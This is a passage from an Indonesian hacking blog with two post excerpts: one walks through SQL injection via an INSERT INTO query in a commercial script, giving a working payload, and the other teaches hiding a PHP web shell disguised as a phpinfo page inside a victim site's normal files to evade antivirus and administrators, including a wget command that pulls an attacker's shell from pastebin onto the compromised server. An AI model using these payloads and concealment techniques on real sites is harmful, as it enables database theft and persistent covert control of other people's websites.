SQL injection insert into query

- 0 comments

assamualaikum,
sql injection, bug tua yang selalu digemari oleh anak-anak muda, dari kalimat tersebut kita bisa tahu sql injection adalah bug yang "never end", selalu saja ditemukan bug ini dibeberapa sistem, baik itu sistem kecil maupun besar.
sql injection mempunya banyak sekali cara, yang paling terkenal yang sering kita dengar pasti select query, itu loh yang biasanya order by. pada query select pun mempunyai banyak sub bug lagi, karena tidak semua kelemahan pada sql injection itu sama, contohnya ada union based, yang sering diketahui orang, kemudian ada error based, ada boolean based, dan ada time based.
tapi pernah gk sih, kalian berfikir bahwa menginjeksi query itu tidak hanya pada query select? tentu sebagian orang tidak berfikir sejauh itu, karena dianggap mustahil dan lain sebagainya, tapi menginjekan query selain pada select, dapat benar-benar terjadi.
contohnya seperti yang akan saya tulis ini, yaitu sql injection dengan insert into query, tentu bug ini sangat-sangat langka, karena sebagian input data sudah dipasangi dengan fungsi escape string, itu loh fungsi yang dapat mengabaikan quote, sehingga karakter quote akan tercetak seperti sedianya, atau tidak dapat digunakan untuk menginjeksi. ya, memang itu kenyataannya, tapi apa salahnya kita mencoba belajar, toh itu akan meningkatkan peluang kita dapat melakukan sql injection.
oke, mungkin intronya cukup sekian aja, sekarang saatnya saya sedikit menjelaskan, hehehe.

bermodal ilmu cupu yang saya punya, saya mencoba melakukan sql injection pada sebuah sistem yang dijual pada codecanyon, dan gocha, saya dapat melakukannya, ini submit saya ke exploit-db tentang bug tersebut.

https://www.exploit-db.com/exploits/44868/



disitu sudah saya jelaskan, sedikit, dengan bahasa inggris saya yang super busuk hahah, LOL

oke sekarang saya jelaskan secara teknis saja, tidak perlu dari awal.
disini ada sebuah form, dan tentu saja form input bukan search, karena digunakan untuk menambah data.


sekarang kita coba masukan data dengan akhiran quote seperti ini.



dan kemudian coba kita masukan data tersebut dengan menekan "new type" button.


eng ing eng, ternyata error gan, oke dengan error seperti ini, kita sudah tahu bahwa form tersebut vuln dan dapat diinjeksi. oke kemudian kita coba membuat payload untuk melakukan eksploitasi pada database tersebut, kita coba yang paling sederhana contohnya menampilkan database.
kita coba query pada mysql dilaptop sendiri, contohnya seperti ini.


oke, sekarang kita tahu bahwa dengan (select database()) kita dapat menampilkan & menambahkan data dengan nama database tersebut ke data, sebetulnya dengan hanya database() kita dapat melakukan hal yang sama, tapi disini saya mencoba memberi tahu, bahwa sebenarnya query select dapat diaplikasikan atau diterapkan pada query insert into.
sekarang kita coba pada form tadi, saya mencoba menebak berapa kolom pada tabel yang akan diinputkan.



coba lihat gambar diatas, dan lihat garis kuning yang saya buat, disana apabila saya memasukan data a pada form, maka hanya keluar a, hemm, dari sini saya mulai menyimpulkan bahwa mungkin ini tabel cuma 2 kolom, ya paling id saya kolom yang di inputkan tadi.
saya mulai berfikir lagi, apabila kolom tersebut cuma 2, maka tidak mungkin saya menampilkan data yang saya inginkan pada kolom tersebut, karena faktanya id sudah pasti integer, dan data yang saja input harus masuk kemudian baru saya injeksi dengan karakter quote, ini sedikit sulit dilejaskan. hehehe.
seperti perkataan saya diawal tadi, bahwa saya akan membuat sebuah payload, disini saya terapkan, apa saja fakta-fakta yang sudah saya temukan.
saya buat payload sederhana seperti berikut : tesaja'), (1000, (select database()))-- -

tesaja'), adalah data normal yang diinputkan bisa dibilang data dengan id yang sudah disiapkan.

(1000, (select database())) adalah data selanjutnya akan kita paksa inputkan, 1000 adalah id, dengan ansumsi saya bahwa id dengan 1000 belum ada, dan untuk data selanjutnya saya mencoba menampilan database dari sistem.

-- - digunakan untuk mengakhiri query, semua query setelah tanda tersebut tidak akan dibaca sebagai query

dan hasilnya seperti berikut.


oke dari penjelasan diatas kita dapat tahu, cara kerja singkat sql injection pada insert into query.
[Continue reading...]

Cara Menyembunyikan Shell Di Website

- 0 comments


hallo agan, assalamualaikum, selamat malam agan semua, bagaimana kabar kalian? semoga baik-baik saja ya, sudah lama banget ane kagak update blog, padahal materi udah lumayan, ya, tapi karena sibuk di kuliah, hehehe.
oke, pada malam ini, ane mau berbagi sedikit ilmu hitam, kalian sudah tahu web shell kan? iya, semacam WSO, galer, indoxploit shell, betak, dan lain sebagainya. yak, shell memang sering memudahkan para attacker maupun pentester untuk menggali informasi, memodifikasi, dan lain sebagainya pada website yang diserang.
tapi sayang, beberapa web shell kadang langsung terdeteksi sebagai virus, oleh antivirus PC, maupun antivirus server, dan juga dapat di kenali oleh admin website.
jadi sekarang ini, ane mau berbagi informasi mengenai cara menyembunyikan webshell di website, oke langsung saja.

alat dan bahan :
1. kopi panas
2. koneksi internet
3. website yang sudah ditanami shell

pembahasan :
oke gan, ini adalah shell super simple, dimana tampilannya adalah php info, tahukan php info? yap, informasi mengenai php di server. kemudian jika di beri parameter ?cmd maka akan keluar form, yang mana ente bisa memasukan command sistem, seperti ls, wget, uname, dan lain-lain. ini source code nya :




pada bagian if(isset($_REQUEST['cmd'])) , cmd bisa kalian ganti dengan apapun, misal bakso ataupun ganteng, terserah, maka pemanggilannya adalah php_info.php?ganteng atau php_info.php?bakso.

jika di rasa shell tersebut masih cukup kurang aman, shell dapat di sembunyikan kedalam file php yang normal, contoh about.php pada website atau index.php, atau service.php, atau yang lain.
sebagai contoh ane masukin ke file services.php yang berisi informasi di website korban.
caranya adalah, taruh kode di bawah ini, di atas </body>


maka hasilnya seperti ini,



dan ini bebas dari antivirus, telah ane test di virustotal, dan coba upload di cpanel.



mungkin shell ini adalah mode 'sleep' dari exploit kalian, jadi jika kalian masih ingin menggunakan shell biasa seperti wso, galer, indoxploit shell, tinggal menggunakan command seperti ini 'wget http://pastebin.com/raw/shellmu -O shell.php' pada bagian pastebin bisa di ganti alamat pastebin shell mu dalam mode raw, maka shell.php akan menjadi shellmu.
[Continue reading...]
 
Copyright © . free everyday - Posts · Comments
Theme Template by BTDesigner · Powered by Blogger